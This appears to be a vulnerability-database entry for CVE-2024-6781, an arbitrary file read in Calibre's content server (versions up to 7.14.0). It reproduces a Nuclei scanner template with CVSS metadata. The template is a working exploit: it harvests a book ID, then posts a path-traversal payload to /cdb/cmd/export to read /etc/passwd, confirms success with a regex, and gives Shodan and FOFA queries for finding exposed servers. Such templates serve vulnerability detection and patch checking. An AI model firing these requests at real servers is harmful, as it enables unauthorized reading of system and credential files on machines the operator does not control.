Calibre <= 7.14.0 Arbitrary File Read

2024-07-3116:29:28

ProjectDiscovery

github.com

cve

calibre

file-read

content-server

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

6.8

Confidence

Low

EPSS

0.004

Percentile

72.6%

JSON

Arbitrary file read via Calibre’s content server in Calibre &lt;= 7.14.0.

id: CVE-2024-6781

info:
  name: Calibre <= 7.14.0 Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
  reference:
    - https://starlabs.sg/advisories/24/24-6781/
  metadata:
    shodan-query: html:"Calibre"
    fofa-query: "Server: calibre"
    verified: true
    max-requeset: 1
  tags: cve,cve2024,calibre,lfi

http:
  - raw:
      - |
        GET /interface-data/books-init HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: book_ids
        internal: true
        json:
          - '.search_result.book_ids[0]'

  - raw:
      - |
        POST /cdb/cmd/export HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        ["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]

    matchers-condition: and
    matchers:
      - type: word
        part: content_type
        words:
          - "application/json"

      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
          - '"result":'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202ca6fce004009bb7f0650dea15c513da500a417c0c88ac7b0e5e45f237a4e7db022076d6e09297483225abdcab453844dd78e248409367b78b3e4b02e80034988c3d:922c64590222798bb761d5b6d8e72950